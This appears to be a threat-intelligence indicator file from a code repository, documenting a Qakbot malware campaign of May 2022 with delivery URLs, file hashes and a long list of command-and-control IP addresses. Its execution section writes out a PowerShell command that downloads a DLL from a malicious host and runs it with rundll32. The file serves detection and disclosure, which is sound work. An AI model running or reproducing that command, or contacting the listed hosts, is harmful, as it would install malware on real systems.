-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_AA_24.05.2022.txt
179 lines (167 loc) · 3.75 KB
/
Qakbot_AA_24.05.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
24.05.2022 | Qakbot | AA | Campaign 1653295661 | Version 403.689
******************************
.url http://spakolsas.com/tuua/onamcduoacltrius
.url https://pequenosreis.com/gV5Oujemx/S.png
.url https://oleitikocottages.com/r4i9PRpVt/S.png
.zip 90658476db025f18ec86d689010bbd1dbb1a6c1199d2cb2f9826c52e0850dafa
.dll f50cc756ef93c314d733c65425c5a4adb98413d8176867b5bbfcaa41fc05b07f
.dll 60c225589579f7667684deff14c30d16c2f14c7c98fbd25b8ab36af7dab019a7
******************************
Exec >>
cmd /c C:\Users\Admin\AppData\Local\Temp\firm146.lnk
powershell.exe -NoExit iwr -Uri https://oleitikocottages.com/r4i9PRpVt/S.png -OutFile $env:TEMP\kol.dll;Start-Process rundll32.exe $env:TEMP\kol.dll,kjhbhkjvydrt
rundll32.exe C:\Users\Admin\AppData\Local\Temp\kol.dll kjhbhkjvydrt
*************************************************
https://tria.ge/220524-pllj1sdffl
*************************************************
c2's
2.50.4.57:443
24.178.196.158:2222
91.177.173.10:995
187.207.131.50:61202
81.129.112.49:2078
124.40.244.118:2222
176.67.56.94:443
140.82.49.12:443
86.97.11.30:443
108.60.213.141:443
84.241.8.23:32103
202.134.152.2:2222
39.44.66.76:995
39.44.62.55:995
197.87.182.35:443
67.209.195.198:443
182.191.92.203:995
39.52.77.102:995
103.116.178.85:995
2.34.12.8:443
217.165.109.187:993
148.64.96.100:443
197.94.85.72:443
121.7.223.59:2222
37.208.155.29:6883
37.34.253.233:443
82.152.39.39:443
90.120.65.153:2078
179.145.13.69:32101
45.241.222.104:993
1.161.122.145:443
75.99.168.194:443
37.186.54.254:995
175.145.235.37:443
93.48.80.198:995
75.99.168.194:61201
80.11.74.81:2222
183.82.103.213:443
47.23.89.60:993
39.41.249.181:995
173.174.216.62:443
78.101.84.56:2222
173.21.10.71:2222
74.14.5.179:2222
103.246.242.202:443
92.132.172.197:2222
217.128.122.65:2222
72.27.86.98:443
186.90.153.162:2222
120.150.218.241:995
78.180.86.123:443
172.114.160.81:995
148.0.15.41:443
69.14.172.24:443
32.221.224.140:995
70.46.220.114:443
46.107.48.202:443
2.50.137.155:443
86.98.208.214:2222
144.202.2.175:443
144.202.3.39:443
45.76.167.26:443
140.82.63.183:995
45.63.1.12:995
45.76.167.26:995
140.82.63.183:443
144.202.2.175:995
149.28.238.199:443
45.63.1.12:443
144.202.3.39:995
149.28.238.199:995
76.25.142.196:443
210.246.4.69:995
117.248.109.38:21
180.129.108.214:995
67.165.206.193:993
45.46.53.140:2222
73.151.236.31:443
174.69.215.101:443
85.246.82.244:443
208.107.221.224:443
82.41.63.217:443
79.80.80.29:2222
217.164.117.199:1194
196.203.37.215:80
41.228.22.180:443
41.84.238.50:995
111.125.245.118:995
120.61.2.124:443
38.70.253.226:2222
106.51.48.170:50001
187.172.219.103:443
89.137.52.44:443
109.12.111.14:443
76.70.9.169:2222
179.158.105.44:443
39.49.23.236:995
72.66.116.235:995
125.168.47.127:2222
172.115.177.204:2222
190.36.232.221:2222
190.252.242.69:443
187.208.122.239:443
101.50.67.212:995
72.76.94.99:443
181.208.248.227:443
47.156.131.10:443
70.51.138.133:2222
40.134.246.185:995
100.1.108.246:443
24.139.72.117:443
189.223.134.157:443
46.176.192.130:995
72.252.157.93:990
201.172.23.68:2222
72.252.157.93:995
189.253.111.196:443
200.148.9.225:32101
72.252.157.93:993
191.250.188.54:443
187.16.64.193:2222
102.182.232.3:995
186.105.119.233:443
24.55.67.176:443
79.129.121.68:995
86.195.158.178:2222
217.164.117.199:2222
125.24.193.41:443
118.161.37.101:995
89.86.33.217:443
47.157.227.70:443
103.107.113.83:443
41.38.167.179:995
113.89.6.31:995
41.84.233.96:443
203.122.46.130:443
197.165.163.159:995
67.69.166.79:2222
81.215.196.174:443
63.143.92.99:995
187.251.132.144:22
68.204.7.158:443
177.157.156.136:443
194.36.28.62:443
5.32.41.45:443
5.193.138.70:2222
173.22.32.101:443
94.36.195.102:2222
76.23.237.163:995
96.37.113.36:993